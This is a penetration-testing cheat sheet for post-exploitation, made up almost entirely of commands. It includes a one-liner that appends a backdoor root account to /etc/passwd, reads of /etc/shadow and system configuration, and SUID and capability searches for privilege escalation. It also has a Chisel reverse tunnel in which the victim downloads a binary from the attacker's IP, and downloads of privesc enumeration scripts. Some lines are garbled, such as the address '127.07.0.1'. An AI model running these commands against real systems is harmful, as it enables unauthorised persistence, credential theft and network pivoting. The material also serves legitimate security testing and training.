Persistence (Maintaining Access) - Privilege Escalation

After the elevation of privileges phase, comes the establishment of a constant access to the target (backdoor, persistence module...).

echo "root2:`openssl passwd toor`:0:0:root:/root:/bin/bash" >> /etc/passwd # to create another root user

User information gathering

Once we have a shell on the victim, we can get a lot of information about the target with the following commands

Linux

# DNS configuration
cat /etc/resolv.conf
# configuration file containing details about user accounts
cat /etc/passwd
# stores the hashed passphrase for Linux user account
cat /etc/shadow
whoami # Display the username associated with the current effective UID.
who -a # Display information about all connected users.
ip a # shows (IPv4 or IPv6) addresses on a device.
iptables -L  # List all firewall rules.
# displays the routing table
ip r
netstat -r
# displays systems information
uname -a
ps aux
# List packages matching given pattern.
dpkg -l <pattern> list | grep installed

Windows

ipconfig /all
ipconfig /displaydns
netstat -bnao
netstat -r

net view
net view /domain
net user /domain
net user %username% /domain
net accounts
net localgroup administrators
net group "Domain controllers" /domain
net share

Linux Privilege Escalation

sudo -l # checks current privileges
cat /etc/sudoers.d/[filename]

netstat -ltupn # listening ports
ss -tulw # listening ports

cat /etc/crontab # checks cronjob

FIND

find / -iname "*config*.php" 2>/dev/null # looking for config files - cat [filename] | grep -i "db_"
find / -user root -perm -u=s 2>/dev/null # Find all files/dirs that are owned by root and have at least the SUID permission

find / -group [name] 2>/dev/null # Find all files/dirs owned by a group
find / -user [username] 2>/dev/null # Find all files/dirs owned by a user

-perm 444 # exactly readable by everyone
-perm /444 # only readable by everyone

-exec [command] [option] {}\; 2>/dev/null # {} corresponds to the files returned by the find command

Capabilities

getcap -r / 2>/dev/null # scan the system for capabilities.

GREP

grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" # grep ip addresses from your output.
grep -rni "somethingToLookFor" / 2>/dev/null

Port forwarding

Using Chisel

# on the attacker
cd /path/where/chisel/is # binary file
updog # or any other command to setup an http server

# on the victim
wget IP:PORT/chisel
chmod +x chisel # set it executable

# on the attacker
chisel server --reverse --port 9002 # port forwarding

# on the victim
./chisel client YOUR_IP:9002 R:9001:[redirectedIP]:[redirectedPort]

# Now you have access on the attacker's machine to : localhost:9001

Using SSH

ssh -N user@[IP_distant] -L [@_redirection_machine]:[port_redirection]:[IP_redirigee]:[port_redirige]

Example:

ssh -N user@10.10.10.10 -L 127.07.0.1:4441:192.168.0.100:80

On the 10.10.10.10 machine, user is running a web server on its 192.168.0.100:80 interface. Here, we're redirecting to the 127.0.0.1 address and port 4441. So from the browser, http://127.0.0.1:4441 is reachable. By specifying a proxy on 172.17.0.2:4440, it is possible to modify the requests on Burpsuite if needed.

Automated scripts for linux privesc

LSE - linux-smart-enumeration

wget "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -O lse.sh;chmod 700 lse.sh

curl "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -Lo lse.sh;chmod 700 lse.sh

LES - linux-exploit-suggester

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh;chmod 700 les.sh

LinPEAS - Linux Privilege Escalation Awesome Script

curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh -Lo lPEAS.sh;chmod 700 lPEAS.sh